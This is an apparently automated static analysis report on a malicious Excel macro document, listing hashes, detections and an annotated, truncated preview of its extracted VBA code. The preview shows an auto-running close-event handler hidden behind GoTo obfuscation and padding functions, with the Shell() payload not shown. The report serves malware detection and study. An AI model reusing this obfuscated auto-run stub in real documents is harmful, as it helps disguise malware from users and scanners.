Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bcb14ff10354d5a…

MALICIOUS

Office (OLE)

283.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: 3bc7a90fbd9f873fb1709133b5786ac0 SHA-1: dc56aee995cbf61545dd92e508a8fc54cb7e0c9d SHA-256: 6bcb14ff10354d5a41a1a287351d84d5e4dbeb4046ed3b1cbe3f7da6626dcbf2
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros, which is a strong indicator of malicious intent. The ClamAV detection further confirms its malicious nature. The VBA script's structure, with numerous GoTo statements and obfuscated function names, suggests an attempt to hide its true functionality, which is likely to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 94169 bytes
SHA-256: 35ab0bf83be37d7e0942d3deebbd5439e90aebce0f64660450b995d0ca49e949
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Module1 entry point reached from ThisWorkbook.Workbook_BeforeClose.
' Its only statement is a bare call to OO_O_O, a procedure that is not
' present in this preview (the extracted source is truncated at 1,000 lines);
' the Shell() call flagged by OLE_VBA_SHELL is therefore not visible here
' and presumably lives in OO_O_O or something it calls — confirm in the full dump.
Sub K_KCa()
OO_O_O
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-executing event handler: Excel invokes Workbook_BeforeClose when the
' workbook is closed, so no user click on a button or form is needed.
' The body is a control-flow-flattening obfuscation: a chain of GoTo jumps
' between randomly named labels. Following the jumps in order resolves to
'   uVsq -> DtZi -> kcAPI -> pYlKK -> kewf -> MTJp -> WNal -> knfD -> obbC
'   -> ZwdG -> vhwADv...rQFCw -> LjEd -> ndIRR -> mitK (End Sub)
' Every assignment on that path is a dead store to an undeclared variable
' whose value is never read in this Sub. The single statement with an
' observable effect is the call to K_KCa (Module1) at the WNal label.
Private Sub Workbook_BeforeClose(Cancel As Boolean)

GoTo uVsqSARDHiHSMfczU:

kcAPIsbdxaf:

vhwADvTxcLHwQGxLVEEr = "FcCkBn"

GoTo pYlKKmuHjCiGYy

kewfBlwCyJbqxyIgbEGm:

FoobbCKYzTyQoApmg = "vSCMSO"

GoTo MTJpkljoagnEfe

vhwADvTxcLHwQGxLVEEeFcoCkBnrQFCw:

vhwADvTxcLHwQGxLVEEr = "FcCkBn"

GoTo LjEdjfruIegpzuQnFa

pYlKKmuHjCiGYy:

rsNPZwdGQDJdlaF = "BAEqjq"

GoTo kewfBlwCyJbqxyIgbEGm

' First label reached: the opening GoTo at the top of the Sub jumps here.
uVsqSARDHiHSMfczU:

dIRRQVGzGlyxNQTL = "zscMhJNcmHU"

GoTo DtZiihmIPQBONe

MTJpkljoagnEfe:

GoTo WNalUTHsUqDRQCGgUS

WNalUTHsUqDRQCGgUS:


' Declared but never used; padding only.
Dim JJyiKgsHoGryWKHBTQ As Long

' The one real action in this handler: hand off to Module1.K_KCa.
K_KCa


GoTo knfDgLJrgAqhvF

ndIRRQVGzGlyxNTLkzscKMhJNcmHUIuVs:

dIRRQVGzGlyxNQTL = "zscMhJNcmHU"

GoTo mitKZuisPKopVq

LjEdjfruIegpzuQnFa:

QFCwOLjEdjfruIegp = "uQnFat"

GoTo ndIRRQVGzGlyxNTLkzscKMhJNcmHUIuVs

knfDgLJrgAqhvF:

GoTo obbCKYzTyQoApgyvSCMSOarsN

DtZiihmIPQBONe:

QFCwOLjEdjfruIegp = "uQnFat"

GoTo kcAPIsbdxaf

ZwdGQDJdlaFBBAEqjq:

rsNPZwdGQDJdlaF = "BAEqjq"

GoTo vhwADvTxcLHwQGxLVEEeFcoCkBnrQFCw

obbCKYzTyQoApgyvSCMSOarsN:

FoobbCKYzTyQoApmg = "vSCMSO"

GoTo ZwdGQDJdlaFBBAEqjq

' Terminal label: the chain ends here and the handler returns.
mitKZuisPKopVq:

End Sub
' Filler function: assigns a string to a local that is never read and
' returns nothing (no assignment to the function name). Not called from
' any code visible in this preview.
Public Function qQAPwCVeTzuvtyjdkNp()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"

End Function
' Filler procedure: a dead local store followed by an 11-iteration loop that
' only calls DoEvents (yields to the message queue). No visible caller.
' The DoEvents loop is presumably a short stall/padding idiom — it has no
' other side effect in this code.
Private Sub UiwduhlKywqIFcy()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm

End Sub
' Filler procedure: dead local store, 11 x DoEvents loop, then a GoTo to the
' label on the very next line (a no-op jump). No visible caller.
Public Sub LJOAtAerqGKNEetmV()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:

End Sub
' Filler function: dead local store, 11 x DoEvents loop, and two GoTo jumps
' that each target the immediately following label (no-ops). Returns
' nothing — the function name is never assigned. No visible caller.
Public Function MGZVsOnfbnESocl()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:

End Function
' Filler procedure: same dead store / DoEvents loop / no-op GoTo pattern,
' plus a string literal assigned to a Currency variable (VBA coerces "3242"
' to a numeric at run time; the value is never read). No visible caller.
Public Sub vHHQbeVuJCmTQrTYmiR()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"

End Sub
' Filler function: dead stores, no-op GoTo jumps and two DoEvents loops
' (11 and 7 iterations). Nothing is returned and there is no visible caller.
' Each generated function in this module appears to be the previous one with
' one more padding statement appended.
Private Function rOJnpVcvDsY()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"
Dim IPQnNMdSVNmPusaOjaQe As Integer
For IPQnNMdSVNmPusaOjaQe = 4 To 10
   DoEvents
Next IPQnNMdSVNmPusaOjaQe

End Function
' Filler function: dead stores ("8261", "3242", "1464" — none are read),
' no-op GoTo jumps and two DoEvents loops. Nothing is returned and there is
' no visible caller. The three literals are presumably meaningless padding
' rather than configuration; confirm against the full extracted source.
Private Function KluGjCiFYkYUOheBl()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"
Dim IPQnNMdSVNmPusaOjaQe As Integer
For IPQnNMdSVNmPusaOjaQe = 4 To 10
   DoEvents
Next IPQnNMdSVNmPusaOjaQe
Dim abwyHfMqFmsLTJpkk As String
abwyHfMqFmsLTJpkk = "1464"

End Function
Public Function RZDePgjmeCgKuqfzqhuE()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"
Dim IPQnNMdSVNmPusaOjaQe As Integer
For IPQnNMdSVNmPusaOjaQe = 4 To 10
   DoEvents
Next IPQnNMdSVNmPusaOjaQe
Dim abwyHfMqFmsLTJpkk As Str
... (truncated)